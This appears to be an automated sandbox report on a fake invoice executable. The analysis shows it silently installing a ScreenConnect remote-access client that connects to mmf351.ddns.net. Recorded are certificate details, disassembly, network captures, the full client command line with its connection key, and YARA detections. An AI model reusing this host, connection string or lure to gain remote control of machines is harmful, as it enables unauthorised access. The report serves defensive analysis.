                                                                                Import Hash:9771ee6344923fa220489ab01239bdfd
                                                                                Signature Valid:true
                                                                                Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                Signature Validation Error:The operation completed successfully
                                                                                Error Number:0
                                                                                Not Before, Not After
                                                                                • 17/08/2022 02:00:00 16/08/2025 01:59:59
                                                                                Subject Chain
                                                                                • CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US
                                                                                Version:3
                                                                                Thumbprint MD5:AAE704EC2810686C3BF7704E660AFB5D
                                                                                Thumbprint SHA-1:4C2272FBA7A7380F55E2A424E9E624AEE1C14579
                                                                                Thumbprint SHA-256:82B4E7924D5BED84FB16DDF8391936EB301479CEC707DC14E23BC22B8CDEAE28
                                                                                Serial:0B9360051BCCF66642998998D5BA97CE
                                                                                Instruction
                                                                                call 00007F76408275BAh
                                                                                jmp 00007F764082706Fh
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                push 00000000h
                                                                                call dword ptr [0040D040h]
                                                                                push dword ptr [ebp+08h]
                                                                                call dword ptr [0040D03Ch]
                                                                                push C0000409h
                                                                                call dword ptr [0040D044h]
                                                                                push eax
                                                                                call dword ptr [0040D048h]
                                                                                pop ebp
                                                                                ret
                                                                                push ebp
                                                                                mov ebp, esp
                                                                                sub esp, 00000324h
                                                                                push 00000017h
                                                                                call dword ptr [0040D04Ch]
                                                                                test eax, eax
                                                                                je 00007F76408271F7h
                                                                                push 00000002h
                                                                                pop ecx
                                                                                int 29h
                                                                                mov dword ptr [004148D8h], eax
                                                                                mov dword ptr [004148D4h], ecx
                                                                                mov dword ptr [004148D0h], edx
                                                                                mov dword ptr [004148CCh], ebx
                                                                                mov dword ptr [004148C8h], esi
                                                                                mov dword ptr [004148C4h], edi
                                                                                mov word ptr [004148F0h], ss
                                                                                mov word ptr [004148E4h], cs
                                                                                mov word ptr [004148C0h], ds
                                                                                mov word ptr [004148BCh], es
                                                                                mov word ptr [004148B8h], fs
                                                                                mov word ptr [004148B4h], gs
                                                                                pushfd
                                                                                pop dword ptr [004148E8h]
                                                                                mov eax, dword ptr [ebp+00h]
                                                                                mov dword ptr [004148DCh], eax
                                                                                mov eax, dword ptr [ebp+04h]
                                                                                mov dword ptr [004148E0h], eax
                                                                                lea eax, dword ptr [ebp+08h]
                                                                                mov dword ptr [004148ECh], eax
                                                                                mov eax, dword ptr [ebp-00000324h]
                                                                                mov dword ptr [00414828h], 00010001h
                                                                                Programming Language:
                                                                                • [IMP] VS2008 SP1 build 30729
                                                                                • [IMP] VS2008 build 21022
                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x129c40x50.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x160000x533080.rsrc
                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x5462000x16a78
                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x54a0000xea8.reloc
                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x11f200x70.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x11e600x40.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_IAT0xd0000x13c.rdata
                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                .text0x10000xb1af0xb200d9fa6da0baf4b869720be833223490cbFalse0.6123156601123596data6.592039633797327IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                .rdata0xd0000x60780x62008b45a1035c0de72f910a75db7749f735False0.41549744897959184data4.786621464556291IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .data0x140000x11e40x8001f4cc86b6735a74429c9d1feb93e2871False0.18310546875data2.265083745848167IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                .rsrc0x160000x5330800x5332000cb59c276652808eb7200fdad38bae5bunknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                .reloc0x54a0000xea80x1000a93b0f39998e1e69e5944da8c5ff06b1False0.72265625data6.301490309336801IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                FILES0x163d80x86000PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.39622565881529853
                                                                                FILES0x9c3d80x1a4600PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.5111637115478516
                                                                                FILES0x2409d80x1ac00PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows0.4415614047897196
                                                                                FILES0x25b5d80x2ec320PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.9812068939208984
                                                                                FILES0x5478f80x1600PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows0.3908025568181818
                                                                                RT_MANIFEST0x548ef80x188XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5892857142857143
                                                                                DLLImport
                                                                                mscoree.dllCorBindToRuntimeEx
                                                                                KERNEL32.dllGetModuleFileNameA, DecodePointer, SizeofResource, LockResource, LoadLibraryW, LoadResource, FindResourceW, GetProcAddress, WriteConsoleW, SetFilePointerEx, GetConsoleMode, GetConsoleCP, FlushFileBuffers, HeapReAlloc, HeapSize, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, RtlUnwind, GetLastError, SetLastError, EncodePointer, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, LoadLibraryExW, RaiseException, GetStdHandle, WriteFile, CreateFileW, MultiByteToWideChar, WideCharToMultiByte, ExitProcess, GetModuleHandleExW, GetACP, CloseHandle, HeapAlloc, HeapFree, FindClose, FindFirstFileExA, FindNextFileA, IsValidCodePage, GetOEMCP, GetCPInfo, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, LCMapStringW, SetStdHandle, GetFileType, GetStringTypeW, GetProcessHeap
                                                                                OLEAUT32.dllVariantInit, SafeArrayUnaccessData, SafeArrayCreateVector, SafeArrayDestroy, VariantClear, SafeArrayAccessData
                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                EnglishUnited States
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 2, 2024 06:13:14.051381111 CEST497038041192.168.2.1179.110.49.16
                                                                                Oct 2, 2024 06:13:14.056328058 CEST80414970379.110.49.16192.168.2.11
                                                                                Oct 2, 2024 06:13:14.056420088 CEST497038041192.168.2.1179.110.49.16
                                                                                Oct 2, 2024 06:13:14.591406107 CEST497038041192.168.2.1179.110.49.16
                                                                                Oct 2, 2024 06:13:14.596298933 CEST80414970379.110.49.16192.168.2.11
                                                                                Oct 2, 2024 06:13:14.767991066 CEST80414970379.110.49.16192.168.2.11
                                                                                Oct 2, 2024 06:13:14.877154112 CEST497038041192.168.2.1179.110.49.16
                                                                                Oct 2, 2024 06:13:14.881984949 CEST80414970379.110.49.16192.168.2.11
                                                                                Oct 2, 2024 06:13:15.068003893 CEST80414970379.110.49.16192.168.2.11
                                                                                Oct 2, 2024 06:13:15.154335976 CEST80414970379.110.49.16192.168.2.11
                                                                                Oct 2, 2024 06:13:15.154634953 CEST497038041192.168.2.1179.110.49.16
                                                                                Oct 2, 2024 06:13:16.020432949 CEST497038041192.168.2.1179.110.49.16
                                                                                Oct 2, 2024 06:13:16.020472050 CEST497038041192.168.2.1179.110.49.16
                                                                                Oct 2, 2024 06:13:16.025640011 CEST80414970379.110.49.16192.168.2.11
                                                                                Oct 2, 2024 06:13:16.025657892 CEST80414970379.110.49.16192.168.2.11
                                                                                Oct 2, 2024 06:13:16.025667906 CEST80414970379.110.49.16192.168.2.11
                                                                                Oct 2, 2024 06:13:16.025677919 CEST80414970379.110.49.16192.168.2.11
                                                                                Oct 2, 2024 06:13:16.025687933 CEST80414970379.110.49.16192.168.2.11
                                                                                Oct 2, 2024 06:14:16.041002035 CEST497038041192.168.2.1179.110.49.16
                                                                                Oct 2, 2024 06:14:16.045990944 CEST80414970379.110.49.16192.168.2.11
                                                                                Oct 2, 2024 06:15:16.056421995 CEST497038041192.168.2.1179.110.49.16
                                                                                Oct 2, 2024 06:15:16.061374903 CEST80414970379.110.49.16192.168.2.11
                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                Oct 2, 2024 06:13:12.935858965 CEST5796653192.168.2.111.1.1.1
                                                                                Oct 2, 2024 06:13:13.733444929 CEST53579661.1.1.1192.168.2.11
                                                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                Oct 2, 2024 06:13:12.935858965 CEST192.168.2.111.1.1.10x8856Standard query (0)mmf351.ddns.netA (IP address)IN (0x0001)false
                                                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                Oct 2, 2024 06:13:13.733444929 CEST1.1.1.1192.168.2.110x8856No error (0)mmf351.ddns.net79.110.49.16A (IP address)IN (0x0001)false

                                                                                Click to jump to process

                                                                                Click to jump to process

                                                                                Click to dive into process behavior distribution

                                                                                Click to jump to process

                                                                                Target ID:0
                                                                                Start time:00:13:05
                                                                                Start date:02/10/2024
                                                                                Path:C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Users\user\Desktop\invoice-benefits-agency9-24-2024.exe"
                                                                                Imagebase:0xf30000
                                                                                File size:5'622'904 bytes
                                                                                MD5 hash:00CD8CE405A29BAD77E5CAEC894B44A0
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1366628403.0000000005FA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000002.1357879683.0000000003521000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000000.00000000.1337072168.0000000000F46000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                Reputation:low
                                                                                Has exited:true

                                                                                Target ID:2
                                                                                Start time:00:13:06
                                                                                Start date:02/10/2024
                                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\ScreenConnect\e6cb77284cf765aa\setup.msi"
                                                                                Imagebase:0xc0000
                                                                                File size:59'904 bytes
                                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:3
                                                                                Start time:00:13:07
                                                                                Start date:02/10/2024
                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                Imagebase:0x7ff786b80000
                                                                                File size:69'632 bytes
                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:false

                                                                                Target ID:4
                                                                                Start time:00:13:07
                                                                                Start date:02/10/2024
                                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding BC344CC8D534C153146082E5C0B08418 C
                                                                                Imagebase:0xc0000
                                                                                File size:59'904 bytes
                                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:5
                                                                                Start time:00:13:07
                                                                                Start date:02/10/2024
                                                                                Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:rundll32.exe "C:\Users\user\AppData\Local\Temp\MSI22D5.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6103906 1 ScreenConnect.InstallerActions!ScreenConnect.ClientInstallerActions.FixupServiceArguments
                                                                                Imagebase:0x350000
                                                                                File size:61'440 bytes
                                                                                MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:6
                                                                                Start time:00:13:09
                                                                                Start date:02/10/2024
                                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 8260A170A10C2A63DD060DA2E17AE0B9
                                                                                Imagebase:0xc0000
                                                                                File size:59'904 bytes
                                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:7
                                                                                Start time:00:13:10
                                                                                Start date:02/10/2024
                                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding EC3C4A72C16F999398D301E804ECE99B E Global\MSI0000
                                                                                Imagebase:0xc0000
                                                                                File size:59'904 bytes
                                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Reputation:high
                                                                                Has exited:true

                                                                                Target ID:8
                                                                                Start time:00:13:10
                                                                                Start date:02/10/2024
                                                                                Path:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe
                                                                                Wow64 process (32bit):true
                                                                                Commandline:"C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.ClientService.exe" "?e=Access&y=Guest&h=mmf351.ddns.net&p=8041&s=64aa4158-b0dc-4cfb-a3e6-dfec05b77827&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&t=invoice&c=choicebenefitsagency&c=https%3a%2f%2fchoicebenefitsagency.com&c=choicebenefitsagency&c=&c=&c=&c=&c="
                                                                                Imagebase:0xa80000
                                                                                File size:95'520 bytes
                                                                                MD5 hash:361BCC2CB78C75DD6F583AF81834E447
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Antivirus matches:
                                                                                • Detection: 0%, ReversingLabs
                                                                                • Detection: 3%, Virustotal, Browse
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                Target ID:9
                                                                                Start time:00:13:11
                                                                                Start date:02/10/2024
                                                                                Path:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "b39d397f-880b-4274-a788-d5e0ae46124e" "User"
                                                                                Imagebase:0xcd0000
                                                                                File size:601'376 bytes
                                                                                MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                Has elevated privileges:false
                                                                                Has administrator privileges:false
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000002.2593006992.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 00000009.00000000.1401316749.0000000000CD2000.00000002.00000001.01000000.00000011.sdmp, Author: Joe Security
                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe, Author: Joe Security
                                                                                Antivirus matches:
                                                                                • Detection: 0%, ReversingLabs
                                                                                • Detection: 0%, Virustotal, Browse
                                                                                Reputation:moderate
                                                                                Has exited:false

                                                                                Target ID:10
                                                                                Start time:00:13:14
                                                                                Start date:02/10/2024
                                                                                Path:C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe
                                                                                Wow64 process (32bit):false
                                                                                Commandline:"C:\Program Files (x86)\ScreenConnect Client (e6cb77284cf765aa)\ScreenConnect.WindowsClient.exe" "RunRole" "2a312dd1-915e-4a70-b7fc-6da8f9a2cf4a" "System"
                                                                                Imagebase:0x480000
                                                                                File size:601'376 bytes
                                                                                MD5 hash:20AB8141D958A58AADE5E78671A719BF
                                                                                Has elevated privileges:true
                                                                                Has administrator privileges:true
                                                                                Programmed in:C, C++ or other language
                                                                                Yara matches:
                                                                                • Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: 0000000A.00000002.1453273212.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                Reputation:moderate
                                                                                Has exited:true

                                                                                Reset < >
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (cq
                                                                                  • API String ID: 0-301743287
                                                                                  • Opcode ID: 29a61f5685dfe89e01b937d3147eb2285d1745c3f8390d0d1898c04cd437699b
                                                                                  • Instruction ID: e4ec948a39def3ccb87844c291616a10a666597a9047be4c40056084d93cc816
                                                                                  • Opcode Fuzzy Hash: 29a61f5685dfe89e01b937d3147eb2285d1745c3f8390d0d1898c04cd437699b
                                                                                  • Instruction Fuzzy Hash: 89B22B75B006049FDB24DFA8C884AADBBB2FF88314F159159E959AB3A5DB30EC41CF50
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: b529c8ab769c999b9e8446b6209e9066fa0d05029bed24e4d3561046157fc6d2
                                                                                  • Instruction ID: a63c79a22abbc255dc83f7fe086f52f7e2b1f869641b779d5553be135bf00e2d
                                                                                  • Opcode Fuzzy Hash: b529c8ab769c999b9e8446b6209e9066fa0d05029bed24e4d3561046157fc6d2
                                                                                  • Instruction Fuzzy Hash: 92625B34A10219CFDB159F64C94479DBBB2FF89300F1085AAF949AB354DB35AD89CF90
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID: 0-3916222277
                                                                                  • Opcode ID: 27f8b3d08b6e8cdeb035132a964f0cfbadb13bdc38909a5b292a830c55ba758d
                                                                                  • Instruction ID: 3dce3a6c087c7e269d6d00455655329764fb942596d824c0c037a5048a3dfbfd
                                                                                  • Opcode Fuzzy Hash: 27f8b3d08b6e8cdeb035132a964f0cfbadb13bdc38909a5b292a830c55ba758d
                                                                                  • Instruction Fuzzy Hash: 5A425D34A10219CFDB259F64C94479DBBB2FF89300F1085AAF949AB358DB75AD85CF80
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $_q$$_q$$_q$$_q$$_q$$_q$$_q
                                                                                  • API String ID: 0-1058846085
                                                                                  • Opcode ID: eeb8352d8a00bdd216732b2e8bcbb9a82cb22b43a7379d34740d6de82b2e60dd
                                                                                  • Instruction ID: fa20bd79e101b9c754ea039c140945b6bd248362bf86c3ef0a546186afd13975
                                                                                  • Opcode Fuzzy Hash: eeb8352d8a00bdd216732b2e8bcbb9a82cb22b43a7379d34740d6de82b2e60dd
                                                                                  • Instruction Fuzzy Hash: 93614871B006158BDB289F39985067EBBBBFFC8724B20442AD5959B354DF32EC02C791
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (cq$Hcq
                                                                                  • API String ID: 0-4250889185
                                                                                  • Opcode ID: 25e86494200bbbca85cc839d276c5918db504c97c602f89e15eca2567fd41a67
                                                                                  • Instruction ID: deac5bad1725a4492edde5d42fa7c45c716edf961e2f976f188899eacf81bd80
                                                                                  • Opcode Fuzzy Hash: 25e86494200bbbca85cc839d276c5918db504c97c602f89e15eca2567fd41a67
                                                                                  • Instruction Fuzzy Hash: 03C16D31E001199FCB04DFA9C884AAEBBF6FF88310F158069E915EB354DB34AD45CBA5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: C8${/
                                                                                  • API String ID: 0-4231431693
                                                                                  • Opcode ID: 8d9dbf13bd47a49374c750239195d05c9d53b51bb09ed790d3a9fd7ce0d3d860
                                                                                  • Instruction ID: 1d38de773e420f7edec3d3d6af9b5371f573c859064f93cd6990948f3b75f56a
                                                                                  • Opcode Fuzzy Hash: 8d9dbf13bd47a49374c750239195d05c9d53b51bb09ed790d3a9fd7ce0d3d860
                                                                                  • Instruction Fuzzy Hash: 905181343102024FC754DB39D69566E7EE6FBCA360348827AE456CB358EF75ED0A8B80
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1357403759.00000000034C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 034C0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_34c0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: (cq$Hcq
                                                                                  • API String ID: 0-4250889185
                                                                                  • Opcode ID: d84954ced28d20d2761764b66f92e1bf0a5892fec3fef9fac66c41baf735dd07
                                                                                  • Instruction ID: d580edc5ea0a1c38f4ffe4ca8c2bd001ddd8b861f8ffc0e4f3dce6daa3af041d
                                                                                  • Opcode Fuzzy Hash: d84954ced28d20d2761764b66f92e1bf0a5892fec3fef9fac66c41baf735dd07
                                                                                  • Instruction Fuzzy Hash: 9D51E239B102498FCF44DF69C4846AEBBE6EB96210F1484AAE905CF340DE34ED0187A5
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Te_q$Te_q
                                                                                  • API String ID: 0-1615656442
                                                                                  • Opcode ID: 5e8a01638f5da94aa7685c709a8b428a49555d86e0991371ac23597ccbd628b5
                                                                                  • Instruction ID: f272f257423232f925e5ff011d9480c21ea6edd0cb21b8c724a1f147b1f7fe74
                                                                                  • Opcode Fuzzy Hash: 5e8a01638f5da94aa7685c709a8b428a49555d86e0991371ac23597ccbd628b5
                                                                                  • Instruction Fuzzy Hash: 533157317002541FCB09AB3D889892E7FD7AFD576036488AED90ACF395DE29ED068395
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: d/eq$vBwq
                                                                                  • API String ID: 0-2421655659
                                                                                  • Opcode ID: 45b809db4f3d157f7970809281693cde431379891db0359becad1ffe3d722487
                                                                                  • Instruction ID: 8879320d8a3dd7f3f9901377452c1f9e74f9fffee912f0309d16d492b0fbafa4
                                                                                  • Opcode Fuzzy Hash: 45b809db4f3d157f7970809281693cde431379891db0359becad1ffe3d722487
                                                                                  • Instruction Fuzzy Hash: FF41C230B00209ABEB089FA9D854BAEBAF7FF88710F60442DE505A73D4DF719D058B94
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366451899.0000000005F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F10000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5f10000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: Te_q
                                                                                  • API String ID: 0-823545363
                                                                                  • Opcode ID: 685671d172c5039c52d6da99f00265bc11347c67f2a8f85f9f36ae3bb0debc1c
                                                                                  • Instruction ID: 71774e7508c8877996eb408add4862cea60115a31d4e074898409366e839019a
                                                                                  • Opcode Fuzzy Hash: 685671d172c5039c52d6da99f00265bc11347c67f2a8f85f9f36ae3bb0debc1c
                                                                                  • Instruction Fuzzy Hash: EAC15F34600615CFCB04DF58C584DBABBF2FF84304B968899E8469B2A6DB34FD49CB94
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000000.00000002.1366325274.0000000005EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05EF0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_0_2_5ef0000_invoice-benefits-agency9-24-2024.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: 4'_q
                                                                                  • API String ID: 0-2033115326
                                                                                  • Opcode ID: 5317b31f848b710a6dc26a21adf53b5bf58adf5d4041d946408c57a2599cd90d
                                                                                  • Instruction ID: 38dde7c66bdb44cdb39ee8e0632a6ac378d783af34bf1699237eff8bf8296d69
